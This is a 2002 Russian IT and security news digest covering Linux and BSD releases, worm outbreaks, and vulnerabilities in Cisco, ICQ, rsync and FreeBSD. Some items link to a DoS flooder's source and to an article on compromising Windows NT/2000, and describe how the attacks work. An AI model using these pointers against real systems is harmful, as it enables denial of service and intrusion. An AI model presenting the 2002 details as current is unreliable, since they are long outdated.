4/02/2002 Интервью с Сергеем Покровским-главным редактором журанала "Хакер".
Новостной сайт NETOSCOPE опубликовал интервью с главным редактором журнала "Хакер" Сергеем Покровским. В нём, в частности, редактор сравнивает свой журнал с "2600"-хорошо, что не с PHRACK. :) Интервью - http://www.netoscope.ru/profile/2002/01/31/4686.html
4/02/2002 "Новые известия" пугают интернетчиков органами .
Эту новость скорее всего можно отнести к газетным "уткам", но тем не менее... Газета "Новые известия" сообщила сенсационную новость о подготовке в недрах МВД неких законодательных инициатив, которые ограничат доступ граждан России к Интернету. По сведениям газеты, готовящиеся поправки к закону "О безопасности" предполагают обязательную регистрацию интернетчиков в орнанах. МВД опровергает эту информацию. Более подробно - http://www.netoscope.ru/news/2002/02/01/4694.html
4/02/2002 Планы выхода дальнейших релизов FreeBSD.
Выход FreeBSD-4.6-RELEASE запланирован на 01.06.2002. Выпуск FreeBSD-5.0-RELEASE планируется в четвёртом квартале 2002 года. Источник - http://www.freebsd.org.ru
4/02/2002 Компании БУКА и ASPLinux подписывают соглашение о сотрудничестве.
Компания "Бука", производитель компьютерных игр и дистрибьюторов мультимедийных продуктов, и компания ASPLinux, специализирующаяся на разработке собственного Linux-дистрибутива и другого ПО под Linux, заключили договор о сотрудничестве. Согласно условиям соглашения, "Бука" становится дистрибьютором коробочных вариантов операционной системы ASPLinux и менеджера разделов жесткого диска Acronis OS Selector. Благодаря этому соглашению, ASPLinux сможет значительно расширить сеть своих дилеров, поскольку у Буки много клиентов и в России, и в ближнем зарубежье. Со своей стороны "Бука" тоже крайне заинтересована в Linux, поскольку спрос на эту операционную систему, согласно проведенным "Букой" исследованиям рынка, день ото дня растет. Подробности - http://www.asplinux.ru/ru/pr/id,25961
4/02/2002 Хакер умудрился уничтожить целого провайдера в Великобритании.
Британская полиция разыскивает неизвестных хакеров, совершивших на прошлой неделе распределенную DoS-атаку на серверы одного из старейших британских интернет-провайдеров, Cloud Nine. В результате компания просто перестала существовать, а восемь ее сотрудников остались без работы. Это первый в истории случай, когда какая-либо компания вынуждена закрыться в результате хакерской атаки. По словам Эмерика Мишти (Emeric Miszti), одного из основателей Cloud Nine, для восстановления работы сетей провайдеру пришлось бы потратить слишком много времени, поэтому штат компании просто решил прекратить работу. Данный случай расследует полиция, однако специалисты по компьютерной безопасности склоняются к мысли, что поиски результатов не дадут. Судя по тому, как методично и тщательно подготавливалась атака, вряд ли хакеры не позаботились о том, чтобы замести следы. По словам Мишти, атака готовилась несколько месяцев: "Их целью было изучить структуру наших сетей, определить ключевые серверы и выяснить их пропускную способность. После этого они смогли нанести удар нужной силы". Кто стоит за этой атакой и зачем ему это понадобилось, Мишти не представляет. На атаку несовершеннолетних хулиганов это явно не похоже. Такая же распределенная DoS-атака была совершена против сайтов eBay, Yahoo и ETrade два года назад. Недавно жертвами такой атаки стали также британский бизнес-портал итальянского провайдера Tiscali и британский хостинг-провайдер Donhost. Хотя атака против Donhost продолжалась несколько часов, а против Tiscali - несколько дней, им повезло куда больше, чем Cloud Nine Communications. Эта компания, в итоге, вынуждена была продать весь свой бизнес и переключить клиентов на своего конкурента Zetnet Internet Services. Источник - http://www.reuters.com
4/02/2002 В Сети завелся червь Hunch.
Техническая лаборатория Panda Software сообщает об обнаружении нового почтового червя под названием Hunch. Уровень угрозы оценивается экспертами Panda Software в два балла, распространения - один балл и повреждений - в три балла по пятибалльной шкале. Подробности - http://www.compulenta.ru/news/2002/2/4/25106/
4/02/2002 Уязвимость в свитчах Catalyst. Компания Cisco официально предупредила всех пользователей, работающих со свитчами Catalyst, об обнаружении свежей дыры безопасности и возможности атаки типа 'отказ в обслуживании'. В настоящий момент данная уязвимость выявлена в устройствах Cisco Catalyst 4000, 5000 и 6000, а также моделях 2948G и 2900. По утверждению специалистов компании Cisco, остальные продукты этого известного производителя устойчивы и не страдают вышеописанным недостатком.
Подробности - http://www.computery.ru/news1/news20204.htm
3/02/2002 Выход Samba 2.2.3.
Samba - набор программ, предназначенных для использования SMB протокола на UNIX-системах и позволяющиx совместно использовать ваши файлы и принтеры пользователям Windows, NT, OS/2 и DOS. Новая версия доступна для скачивания. Скачать - ftp://ftp.samba.org/pub/samba/samba-2.2.3.tar.gz
3/02/2002 Как открыть доступ к определенной части сервера только для IP в зоне .RU.
В журнале Cooler №309 появилась очень интересная заметка на тему определения зоны к которой принадлежит заданный IP. Обсуждаются ВСЕ методы решения данной проблеммы. Прочитать заметку: http://www.cooler.it/cl300102.html
3/02/2002 Уязвимость в NetScreen ScreenOS.
По данным securityfocus.com, популярный программный продукт ScreenOS содержит уязвимость, позволяющую злоумышленнику провести DoS атаку на сервер. Подробности - http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=discussion&id=4015
3/02/2002 Уязвимости в EServ 2.97.
Популярный прокси-сервер EServ содержит пару уязвимостей, которые могут быть использованы для проведения DoS атаки против него. Подробности - http://ntsecurity.nu
3/02/2002 Linux 2.5.3-dj1.
Вышел первый патч к ядру 2.5.3, включающий некоторые исправления в работе с файловой системой reiserfs. Скачать - ftp://ftp.kernel.org/pub/linux/kernel/people/davej/patches/2.5/
2/02/2002 Выход Gnome 2.0 Alpha 2.
Сегодня разработчики популярного оконного менеджера Gnome объявили о выходе 2-й альфа версии своего творения. Скачать - ftp://ftp.gnome.org/pub/GNOME/pre-gnome2/releases/gnome-2.0-desktop-alpha2/
2/02/2002 Обновление программы: Access Denied ScreenSaver.
По многочисленным просьбам была добавлена поддержка разрешения экрана 800х600. Был устранен баг по криптованию пароля и изменен сам алгоритм криптования. ВНИМАНИЕ: В связи с установкой нового алгоритма криптования, перед установкой новой версии удалите файл access.ini в папке с MS Windows. Скачать программу: http://www.uinc.ru/scripts/load.cgi?files/agapov25/accessd.exe
2/02/2002 Уязвимость в Pine.
Популярный почтовый клиент под Linux содержит уязвимость, которая может быть использована для выполнения shell команд на машине пользователя. Подробности - http://www.newsforge.com/article.pl?sid=02/02/01/2230251&mode=nocomment
2/02/2002 Уязвимости в GZIP.
Вчера представители Mandrake Linux Security Team сообщили о новых уязвимостях в популярном архиваторе для Linux. Первая из двух найденных уязвимостей при определенных обстоятельствах приводит к аварийному завершению работы программы, вторая - является стандартной ошибкой переполнения буфера. Подробности - http://www.newsforge.com/article.pl?sid=02/02/01/221221&mode=nocomment Патч - http://www.gzip.org/#patch
1/02/2002 Вирусные рейтинги января.
Российский разработчик антивирусного ПО, компания "Лаборатория Касперского", опубликовала первый в этом году рейтинг самых популярных вирусов месяца. Первое место в двадцатке января с огромным отрывом снова занял BadtransII. В этом месяце из всех зарегистрированных случаев заражения, на его долю пришлось 65,6% инцидентов. Второе место занимает появившейся еще весной прошлого года, и с тех пор не сильно сдающий своих позиций Sircam. Источник - http://www.bezpeka.com/news/index.html#01-02-01
1/02/2002 Новое в разделе Cool Stuff: Nmap 2-30b binary win32.
К сожалению, на официальном сайте Nmap откомпилированные бинарики для Win32 платформы не раздают, мы долго искали таковые, но кроме старого релиза от eEye Digital Security ничего найдено не было, поэтому мы откомпилировали исходники сами и выложили их для других. Данный релиз требует установленные драйверы PCap. Скачать: http://www.uinc.ru/scripts/load.cgi?cool_stuff/nmap-2-30b-bin-win32.zip
1/02/2002 Новая статья: Локальный и удаленные взломы Windows NT/2000..
Описываются методы получения администраторских прав на платформах Windows NT/2000. Собраны вместе уникальные и ранее не публиковавшиеся способы локального и удаленного взлома этих систем. Ознакомиться: http://www.uinc.ru/articles/29/index.shtml
1/02/2002 Оценка производительности систем под управлением различных версий ядра Линукс.
Вчера Randy Hron в почтовой рассылке linux-kernel mailing list опубликовал результаты анализа производительности системы под управлением всех версий ядра Линукс начиная с версии 2.4.5. Ознакомиться - http://home.earthlink.net/~rwhron/kernel/k6-2-475.html Архив рассылки - http://www.uwsg.indiana.edu/hypermail/linux/kernel/index.html
1/02/2002 AOL заблокировала интернет-пейджер Trillian.
Компания AOL Time Warner, владелец ICQ и AIM, продолжает бороться с альтернативными клиентскими программами для доступа к своим службам обмена мгновенными сообщениями. Компания заблокировала сервис SecureIM для пользователей Trillian - интернет-пейджера, одновременно поддерживающего ICQ, AIM, Yahoo, MSN и IRC. Ознакомиться - http://www.compulenta.ru/news/2002/1/31/25045/
1/02/2002 Oracle собирается переводить свой бизнес на Linux-сервера.
Руководитель корпорации Oracle объявил о том, что в ближайшее время три Unix-сервера, на которых работает основная масса бизнес-приложений компании будут заменены на блок серверов на базе процессоров Intel под управлением ОС Linux. "Мы будем работать на Linux уже летом, и в итоге весь наш бизнес переведем на Linux", - сказал Ларри Эллисон. Подробности - http://www.compulenta.ru/news/2002/2/1/25059/
1/02/2002 Вирусные сканеры не справляются с новым червем MyParty.
Многие антивирусные компании поторопились отнести червя MyParty к категории не очень опасных, заявляя, что свежие апдэйты их продуктов предотвращают заражение MyParty. Несмотря на обновления, инфицированные письма продолжают заражать огромное число компьютеров во всем мире. Это происходит вопреки тому, что антивирусные решения для почтовых шлюзов призваны блокировать "больные" письма ещё на сервере. Подробности - http://www.bezpeka.com/news/index.html#30-01-02
1/02/2002 HP заключает договор с MandrakeSoft.
Компания Hewlett-Packard заключила договор с французской компанией MandrakeSoft, согласно которому будет производить для европейского и североамериканского рынков персональные компьютеры с предустановленным Linux дистрибутивом Linux Mandrake. Подробности - http://zdnet.com.com/2100-1103-826283.html
1/02/2002 Netcraft представил очередной обзор состояния сети.
Вчера на сервере www.netcraft.com появились очередные рузультаты анализа сети, включающие в себя статистику по веб серверам, новым доменам и многое другое. Подробности - http://www.netcraft.com/survey/ Источник - http://www.newsforge.net/
31/01/2002 Выпущен новый софт для мобильников фирмы "Сименс".
Ранее в компьютерных новостях сообщалось, что на одной из компьютерных выставок была продемонстрирована возможность "завесить" мобильные телефоны фирмы "Сименс" (как выснилось, это было характерно для моделей 3508i,3518i,3568i). Атака, подобная компьютерной DoS, выводила телефоны из строя. Активизировать SIMM-карту отказавшего мобильника можно было только, вставив её в другой телефон. Вчера в списке рассылки BUGTRAQ было объявлено, что SSMC(Siemens Shang Mobile Communication Ltd) выпустила новую версию программного обеспечения для названных моделей мобильных телефонов-версию 23. Всем пользователям 35 серии мобил рекомендуют обратиться в региональный сервисный центр для обновления программного обеспечения. Источник - http://www.securityfocus.com
31/01/2002 Microsoft выпускает патч, решающий проблемы с записью CD в Windows XP.
Компания Microsoft выпустила очередное обновление для операционной системы Windows XP. На этот раз в последней ОС софтверного гиганта была обнаружена ошибка во встроенных средствах записи CD-R и CD-RW. Данная возможность преподносилась компанией как одно из самых удобных средств в операционной системе. Однако, как выяснилось позже, во встроенном в WinXP CD-рекордере при определенных обстоятельствах происходила ошибка записи. В результате, пользователь получал диск CD-R или CD-RW, который читается только на компьютере с Windows XP. Чтобы решить данную проблему, необходимо скачать соответствующий пакет обновлений . Патч (300 кб) доступен здесь: http://download.microsoft.com/download/whistler/Patch/Q309691/WXP/EN-US/Q309691_WXP_SP1_x86_ENU.exe
31/01/2002 Microsoft выпустила новый набор заплаток для Windows 2000.
Компания Microsoft объявила в среду о выпуске набора исправлений для Windows 2000, предназначенных для ликвидации целого ряда уязвимых мест в системе безопасности этой операционной системы. Такой набор исправлений, получивший название Security Rollup Package является новой для Microsoft формой обновления своих продуктов. Ранее компания выпускала заплатки к системе безопасности в виде самостоятельных обновлений, а затем они включались в очередной Service Pack. Однако в связи с взятым Microsoft курсом на повышение безопасности своих продуктов, в компании решили, что частота выпуска "сервис паков" недостаточна с точки зрения обеспечения безопасности пользователей, что и привело к появлению Security Rollup Package. Первый набор исправлений системы безопасности Windows 2000 содержит около 40 заплаток к различным дырам в операционной системе, позволяющих реализовывать DoS-атаки или захватывать контроль над компьютером. Все ошибки, исправляемые Security Rollup Package, были обнаружены после выхода Service Pack 2 для Windows 2000, состоявшегося в мае. Интересно отметить, что часть уязвимостей до сих пор не стала достоянием гласности. Обновление системы безопасности может устанавливаться на компьютеры с ОС Windows 2000 в вариантах Professional, Server и Advanced Server при условии, что на них уже установлен Service Pack 2. Источник - http://www.idg.net/
31/01/2002 Выход ядра Linux 2.5.3.
Вчерашний день ознаменовался выходом продолжения нестабильной ветви ядра Линукс 2.5.3. Данный релиз включает в себя множество апдейтов драйверов, изменения в VFS, теперь struct inode является общей для всех FS, а для fs-specific данных память выделяется отдельно для каждой fs по мере необходимости. Скачать - ftp://ftp.ru.kernel.org/pub/linux/kernel/v2.5/linux-2.5.3.tar.gz
31/01/2002 Выход OpenLinux 3.1.1.
Компания Caldera International, Inc. сегодня сообщила о выпуске Caldera OpenLinux Workstation 3.1.1 и Caldera OpenLinux Server 3.1.1. Cайт компании - http://www.caldera.com/
31/01/2002 Новый вирус распространяется через старые дыры в Outlook.
Антивирусная компания "Panda Software" сообщает о появлении нового почтового вируса. Червь, получивший название W32/Klez.G, распространяется через электронную почту в приложении к письму, используя давно известную дыру в Outlook и Outlook Express. Подробности - http://www.compulenta.ru/news/2002/1/31/25019/
31/01/2002 Переполнение буфера в telnet коммутаторов Cisco Catalyst.
29 января вышел бюллетень по безопасности компании Cisco, касающийся уязвимости коммутаторов Cisco Catalyst, работающих на базе операционной системы CatOS. В коммутаторах Cisco Catalyst версий 6000 series, 5000 series, 4000 series, 2948G и 2900, работающих на базе CatOS, обнаружена уязвимость переполнения буфера демона telnet, что приводит к перезагрузке коммутатора. Уязвимость может быть использована злоумышленником для организации DoS-атаки. Коммутаторы семейства Catalyst, работающие на базе IOS, данной уязвимости не подвержены. По материалам: http://www.bezpeka.com/news/index.html#30-01-01
30/01/2002 Выход rsync 2.4.6.
Reh Hat Inc. объявила о выходе новой версии утилиты rsync для Linux, предназначенной для создания зеркал структур директорий на нескольких машинах. В новой версии программы отсутствует обнаруженная недавно уязвимость, позволяющая удаленно нарушать работу клиента rsync и запускать программный код. Источник - http://www.compulenta.ru/news/2002/1/28/24867
30/01/2002 Sun Microsystems усовершенствует свои сервера.
Sun Microsystems Inc. объявила об усовершенствовании своего Cobalt Qube сервера, которое заключается в интеграции специализированного ПО, призванного обеспечить защиту и удобное управление сервером. Источник - http://www.bezpeka.com/news/index.html#29-01-03
30/01/2002 Выход FreeBSD 4.5.
Сегодняшний день ознаменовался долгожданным выходом FreeBSD 4.5. Источник - http://kerneltrap.com/ ISO образ - ftp://ftp.FreeBSD.org/pub/FreeBSD/
30/01/2002 Jay Beale: "Линукс - ужасно ненадежная система".
Jay Beale, разработчик Bastille Linux и, по совместительству, независимый консультант по вопросам безопасности, в первый день выставки LinuxWorld дал интервью, в котором раскрыл основые недостатки в системе безопасности ОС. Подробности - http://www.newsforge.com/article.pl?sid=02/01/29/1635245&mode=thread
30/01/2002 Открывается Linux World Expo.
В Нью-Йорке с 29 января по 1 февраля проходит выставка/конференция Linux World Expo. Участвуют: Caldera, Debian, IBM, Intel, FSF, Mandrake, NetBSD foundation, KDE, Sun, X.org, Borland Inc.... Borland, по сообщению InfoWorld, планирует представить продукт, основанный на C++ и работающий под Linux. Что именно это будет за продукт, пока не известно. Возможно, это окажется Borland C++ Builder для Linux, однако не исключено, что компания просто портировала свой компилятор Borland C++, версия которого для Windows давно распространяется бесплатно. Cайт выставки - http://www.linuxworldexpo.com/
30/01/2002 Вышел журнал Free Software Magazine.
15 января вышел 1-й номер журнала Free Software Magazine. Рекомендуется для программеров и админов. Интернет-версия - http://www.rons.net.cn/english/FSM/issue01
30/01/2002 Public preview Lindows 0.9.
На NewsForge описаны первые впечатления от установки Lindows 0.9 (выросшего из Debian): * есть некоторые проблемы с запуском/инсталляцией приложений Windows,например, MSIE сообщает, что для установки ему нужен именно Windows :) * пользователь по умолчанию - root, устанавливать для него пароль не рекомендуется, так как его "легко забыть, а восстановить - никак" * корректная работа wine не от рута не гарантируется * инсталлятор в лучших традициях практически ничего не спрашивает, даже язык и часовой пояс (видимо для неанглоговорящих пользователей система не предназначена) Подробности - http://www.newsforge.com/article.pl?sid=02/01/25/1811226&mode=thread
30/01/2002 Net Control - программа для удаленного администрирования .
Net Control расширяет возможности администраторов сетей и других пользователей, заинтересованных в обеспечении контроля за удаленными компьютерами. С помощью этого приложения можно производить следующие действия над удаленным ПК: изменять права доступа к файлам и принтерам, выключать компьютер, перезагружать компьютер, запускать программы, отправлять текстовые сообщения, отправлять и проигрывать звуки, отправлять и принимать файлы, изменять системные политики, контролировать клавиатуру и мышь, делать скриншоты и т.д. Механизм контроля реализован следующим образом: требуется запустить сервер на удаленной машине (для этого необходимо иметь полный доступ) и настроить адресацию. В дальнейшем сервер будет автоматически загружаться при запуске Windows. Для пользователей из стран бывшего СССР регистрация является бесплатной. В качестве регистрационных данных нужно использовать следующие: Name - xUSSRрегистрация, Unlock-code - текущий день недели строчными буквами. Скачать можно здесь - http://tucows.rinet.ru/files4/net.exe
30/01/2002 Лидерами по числу хакерских атак признаны США и Израиль.
Компания Riptech, специализирующаяся на мониторинге корпоративных систем компьютерной безопасности, опубликовала отчет об активности хакеров в различных странах мира в 2001 г. Отчет был подготовлен на основе расследования 128 тыс. случаев нападения хакеров на корпоративные компьютерные системы. При этом максимальное число атак (30%) исходило из Соединенных Штатов, что неудивительно, учитывая высокую распространенность интернета в этой стране. После США лидерами по числу хакерских атак стали Южная Корея, КНР, Германия, Франция и Канада. Однако, если рассмотреть относительные показатели, например то абсолютным чемпионом становится Израиль. В этой стране на 10 тыс. пользователей интернета приходится 26 хакерских атак, что вдвое больше, чем в Гонконге, занимающем по данному показателю второе место. Далее по списку идут Таиланд, Южная Корея, Франция, Турция и Малайзия. В США на 10 тыс. интернетчиков приходится лишь 3,5 атаки. Интересно, что, по данным Riptech, в число лидеров по абсолютному или относительному числу атак не вошла ни одна из стран бывшего СССР, хакерами из которых столь часто пугают пользователей. Источник - http://www.reuters.com/
29/01/2002 Эпидемия вируса Myparty. "Лаборатория Касперского": "Не все, что начинается с www и заканчивается com - веб-сайты".
Как сообщает "Лаборатория Касперского", был обнаружен новый интернет-червь "Myparty", распространяющегося по электронной почте. Вирус представляет собой Windows-приложение размером около 30 килобайт, написанное на языке программирования Microsoft Visual C++ и упакованным утилитой сжатия UPX. Он прилагается к письму в виде файла с именем www.myparty.yahoo.com - очень похоже на название сайта, на что и сделан расчёт. Однако, как отмечают в "Лаборатории Касперского", на .com кончаются не только доменные имена. Com - это одно из расширений исполнимых файлов в операционных системах Microsoft. При запуске файла активизируется вредоносная программа. "Это действительно новая техника манипуляции сознанием пользователя, исключительно благодаря которой "Myparty" вызвал ряд заражений. В остальном - это классический Интернет-червь, ничем не отличающийся от сотен себе подобных созданий, - комментирует Денис Зенкин, руководитель информационной службы "Лаборатории Касперского". Более подробно - http://www.compulenta.ru/news/2002/1/28/24868/
29/01/2002 Обнаружена очередная уязвимость в Windows XP.
В операционной системе Windows XP обнаружена очередная уязвимость. Проблема с безопасностью несколько отличается от выявленной ранее дыре в защите uPnP, так как речь идет о неверной работе системы с гостевой учетной записью. Как известно, гостевой вход предназначен как для локального, так и удаленного входа в систему и связанных с этим установок безопасности и доступа к файлам. Выяснилось, что в Windows XP Home Edition удаление записи Guest с помощью меню в панели управления, не приводит к закрытию доступа к данной учетной записи. Система удаляет гостевую запись из меню быстрого переключения между пользователями, но не отключает гостевой вхож полностью. Таким образом, даже отключенный (только видимо) гостевой вход может быть использован для получения доступа к ресурсам компьютера и для проведения атак. Компания Microsoft описывает поведение системы при работе с гостевой учетной записью, как заранее предопределенное. На сайте Microsoft говорится о том, что по причине важности учетной записи Guest для работы компьютера в сети, она не может быть удалена из системы. Подробности - http://www.compulenta.ru/news/2002/1/28/24861/
29/01/2002 Флуд из FIN+ACK TCP-пакетов приводит к утечке памяти в ядре ОС WinNT, Win2K.
Вчера в списке рассылки BUGTRAQ 3APA3A (ведущий сервера по безопасности www.security.nnov.ru) опубликовал исходные тексты программы stream3.c. Программа представляет собой флудер, посылающий множество пустых TCP-пакетов с выставленными флагами ACK и FIN. На непатченных WinNT, Win2K (без патча SP2) происходит утечка памяти ядра. Атака ведётся против NetBIOS порта (139/TCP). Эффективность зависит от следующих условий: количества ОЗУ на машине-цели, схемы маршрутизации (на неправильно настроенных роутерах можно передавать пакет, исходным адресом которой будет внутренняя машина сети/сегмента) и "ширины" канала между источником атаки и целью (xDSL/10BaseT-идеальный вариант). Результатом атаки может быть как потеря 2-3 МБ ОЗУ, так и "синий экран". Уязвимости подвержены ОС: Windows 2K Professional/Server/Advanced Server, WinNT Workstation/Server. Для защиты автор рекомендует проапдейтить Win2K при помощи SP2 и фильтровать траффик на роутерах при доступе на привилегированные порты. Описание - http://www.security.nnov.ru/advisories/stream3.asp Исходник stream3.c - http://www.security.nnov.ru/files/stream3.c
28/01/2002 Временное закрытие проекта void.ru.
На прошлой неделе проект void.ru был временно приостановлен. По всем вопросом о причинах временного закрытия проекта void.ru пишите на email: Sp0Raw sp0raw@mail.ru или обращайтесь на icq: 667169 Пожалуйста, не распространяйте слухов и пресекайте их распространение другими! Источник-канал IRC: #!void@efnet
28/01/2002 Архив взломов Safemode тоже сошел с дистанции .
Один из немногочисленных сайтов-архивов сетевых взломов Safemode.org объявил о своем закрытии. Причина банальна - количество взломов за последнее время выросло настолько, что ежедневно архивировать их все стало физически невозможно. Архив Safemode.org не первый, кто устал от потока взломов. В мае 2001 г. закрылся Attrition.org, некогда крупнейший архив обезличенных сайтов,: для сотрудников архива хобби практически превратилось в настоящую работу, по количеству затрачиваемого на нее времени. В свое время Attrition.org стал примером для Zillion - человека, организовавшего Safemode.org. Safemode.org был создан Зиллионом в 1998 году. Сохранять у себя зеркала взломов команда, работающая над сайтом, начала в 1999-м. В последний раз информация в архиве обновлялась 24 января этого года. В этот день зафиксировано 37 взломов. Огромный архив обезличенных сайтов продолжает оставаться доступным для всех желающих. Подробности - http://www.ananova.com/news/story/sm_504627.html?menu=news.technology
28/01/2002 CERT рекомендует пользователям ICQ ставить версию 2001B Beta v5.18 Build #3659.
Финансируемая из бюджета США организация CERT, специализирующаяся на проблемах компьютерной безопасности, сообщила об обнаружении опасной дыры в популярнейшем интернет-пейджере ICQ. Используя уязвимость в реализации прямого соединения между двумя компьютерами с ICQ, хакер может получить контроль над системой и запускать на взломанной машине любые программы. По данным CERT, программы, позволяющие использовать указанную дыру в ICQ уже существует, однако методика взлома пока не опубликована в Интернете, попыток сканирования компьютеров с целью поиска уязвимых версий ICQ равно как и использовать брешь также замечено не было. Переполнение буффера существует в "Voice Video & Games feature request" сообщении. Никаких заплаток для ликвидации дыры пока не выпущено. Вполне возможно, что для устранения проблемы AOL переконфигурирует серверы ICQ так, чтобы через них не проходили опасные запросы. Именно таким образом компания поступила, когда аналогичная уязвимость была найдена в другом интернет-пейджере AIM. Однако для ICQ такой способ не совсем годится, так как возможность отправки запроса напрямую от компьютера к компьютеру все равно сохраняется. В качестве мер по противодействию, CERT предлагает: поставить версию 2001B Beta v5.18 Build #365 (она удаляет плагин, который активизирует опасную функцию), блокировать на внешнем файрволле порты-4000/UDP, 5190/TCP, плюс порты клиентов-ICQ (что не совем реально, поскольку при каждом запуске ICQ назначает новый локальный порт) и не принимать сообщения от неавторизованных и незнакомых людей. Подробный отчёт CERT - http://www.cert.org/advisories/CA-2002-02.html Отчёт об уязвимости на SECURITYFOCUS - http://www.securityfocus.com/bid/3813
28/01/2002 Выпущена бета-версия ОС Mandrake Linux 8.2 Beta 1.
Компания MandrakeSoft выпустила новую версию дистрибутива на базе Linux - Mandrake Linux 8.2 Beta 1. В популярном дистрибутиве на базе открытой операционной системы произошли следующие изменения: обновлен интерфейс Mandrake Control Center, переработан процесс инсталляции системы, добавлена опция установки минимального набора приложений, обновлена система аварийного восстановления системы, добавлена поддержка файловых систем с шифрованием. В новой версии Mandrake Linux добавлен набор утилит для резервного копирования системных файлов Drakbackup, появились средства удаленного контроля над сессией X-Window. Кроме указанных изменений, также имеется множество других нововведений. Подробности -http://www.linux-mandrake.com/en/ftptmp/1012168921.fcfc320ee9b8a251aa76c8a814be90ca.php#beta
28/01/2002 Sun предлагает Solaris 9 для массового ознакомления.
Sun Microsystems сообщила о том, что ознакомительная версия ее новой операционной системы -- Solaris 9 Early Access -- теперь доступна не только разработчикам, но и массовому пользователю. Подробности - http://www.sun.com/solaris/programs/solaris9ea/
28/01/2002 RealNetworks выпустила патч для проигрывателя RealPlayer.
Компания RealNetworks выпустила патч, устраняющий дыру в системе безопасности RealPlayer 8. Воспользовавшись этой брешью, злоумышленник может "повесить" проигрыватель и, возможно, даже запустить вредоносную программу. Согласно сообщению компании, патч исправляет ошибку переполнения буфера, которая была обнаружена Тимом Морганом, экспертом по безопасности из Орегона. Проделав некоторые изменения в заголовках файлов Real media, можно вызвать переполнение буфера и последующее зависание проигрывателя. Морган сообщил, что как Windows-, так и Unix-версии Real Player содержат эту недоработку. Ошибки переполнения буфера считаются опасными, потому что они могут позволить хакеру заставить систему выполнять вредоносный код после аварийного завершения программы. Но Моргану не удалось найти способ использования этого слабого места Real Player для запуска собственного кода. Тем не менее, он полагает, что это смогут сделать более опытные взломщики. Патч будет доступен - http://www.service.real.com/help/faq/security/index.html
27/01/2002 Adrian Bunk уходит из Debian.
Adrian Bunk, один из ведущих разработчиков программного обеспечения для Линукс дистрибутива Debian , на счету которого было более 40 законченных разработок (в том числе и "порт" ядра 2.4), принял решение об уходе из команды. По его словам, он после нескольких недель размышлений пришел к выводу, что не видит заметного прогресса в деательности компании. Подробности - http://www.debianplanet.org/article.php?sid=581
27/01/2002 Выход Apache 1.3.23.
Новый релиз направлен на исправление ошибок, допущенных в предыдущей версии, а так же содержит несколько нововведений, включая поддержку HTTP/1.1 для mod_proxy. Подробности - http://www.apacheweek.com/issues/02-01-25
27/01/2002 Серия однотипных уязвимостей в rsync.
23 января 2002 г. Sebastian Krahmer из SuSe обнаружил серию однотипных ошибок (signedness bugs) в широко распространенной программе rsync. Эта уязвимость позволяет потенциальному злоумышленнику влиять на выполнение программы rsync (как в режиме клиента, так и в режиме сервера) с последующим получением прав пользователя, ее запустившего. За обновлениями обращайтесь к разработчикам своего дистрибутива. Источник - www.linux.ru.net
27/01/2002 Обзор LindowsOS.
На сервере newsforge.com помещен обзор новой операционной системы Lindows. Материал включает в себя описание этапов инсталяции ОС, настройки, запуска Win32 приложений. Ознакомиться - http://www.newsforge.com/article.pl?sid=02/01/25/1811226
27/01/2002 SILC, новое поколение безопасных chat-протоколов .
Задумывались ли Вы когда-либо о том , является ли Ваша переписка с кем-либо в Internet достоянием лишь Вас и Вашего собеседника? Существует ли способ обезопасить себя от "прослушивания" в сети? Ответ на этот и другие вопросы приводит Pekka Riikonen в свой статье, посвященной новому поколению chat-протоколов Secure Internet Live Conferencing или просто SILC. Статья - http://www.newsforge.com/article.pl?sid=02/01/25/1727252&mode=thread
26/01/2002 Возможность получения прав root в ОС FreeBSD .
Ошибка, возникающая при определенных обстоятельствах, существует в реализации системного вызова ядра ОС FreeBSD. Обычный локальный пользователь имеет возможность подключиться отладчиком к процессу во время его запуска до того, как ядро определит, что процесс является суидным (suid/sgid). Как следствие, данный пользователь может получить права root. Подробности - http://www.bezpeka.com/
26/01/2002 Проблемы с безопасностью данных в компьютерах Vaio.
По данным www.cnet.com компания Sony признала факт того, что более 900000 компьютеров и ноутбуков серии Vaio подвержены уязвимости, позволяющей получить удаленный доступ к системе. Подробности - http://www.cnet.com
25/01/2002 Компания Loki прекращает свою деятельность.
На протяжении трех лет компания Loki уверенно держала первенство на рынке производства игровых приложений для OC Линукс. Внезапно президент компании Scott Draeker заявил о том, что c 31.01.2002 Loki Entertainment Software прекращает работу над проектами и приостанавливает поддержку пользователей. Подробности - http://www.newsforge.com/article.pl?sid=02/01/24/2118235&mode=thread
25/01/2002 Новый релиз GAIM.
Вчера разработчики популярного chat клиента под Unix системы представили новую версию своей программы (GAIM 0.51). Теперь использовать возможности протокола OSCAR могут и пользователи Mac OS X. Подробности - http://gaim.sourceforge.net/
25/01/2002 Линус Торвальдс дает интервью еженедельнику eWeek на выставке LinuxWorld Conference and Expo в Нью-Йорке.
Следующая неделя в Нью-Йорке пройдет под знаком Линукс - город принимает выставку LinuxWorld. Перед началом экспозиции в центре внимания репортеров оказался Линус Торвальдс. В своем интервью Линус делится своими планами на будущее, характеризует прошедший год, коротко описывает процесс разработки ветви ядра 2.5. Подробности - http://www.eweek.com/article/
25/01/2002 Обновление статьи: Переустанавливаем Windows за три минуты..
+ В список обновлений добавлены патчи NoHTML и Disable Plug-n-Play + Обновлен метод очистки системы без переустановки. Добавлены ссылки на программы RegCleaner, Ashampoo WinOptimizer 2000, NBG Clean Registry, EasyCleaner. + Очередное дополнение - письмо про недостатки Drive Image + Кое-какие поправочки и мелкие дополнения Ознакомиться можно здесь: http://www.uinc.ru/articles/zametki/004.shtml
24/01/2002 Вышел новый релиз MenuetOS 0.64.
Вышел новый релиз многозадачной операционной системы распространяемой по лицензии GPL. Она уже не раз упоминалась в средствах массовой информации, таких как журналы Dr.Dobb's и ПРОГРАММИСТ. Известна тем, что полностью написана на ASM32. Menuet нетребовательна к системным ресурсам, и легко сможет уместиться на одной дискете. Выход MenuetOS 0.64 стал днем независимости Menuet, с ее выходом стало возможным отлаживать и исправлять ядро не выходя из операционной системы. До этого при компиляции ядра было необходимо использовать вместо встроенного компилятора(FASM) внешний(NASM). Фактически, работать над разработкой системы не выходя из нее было невозможно. Подробности - http://menuetos.org/
24/01/2002 Darren Reed выпустил OpenBSD 3.0 с IP-Filter.
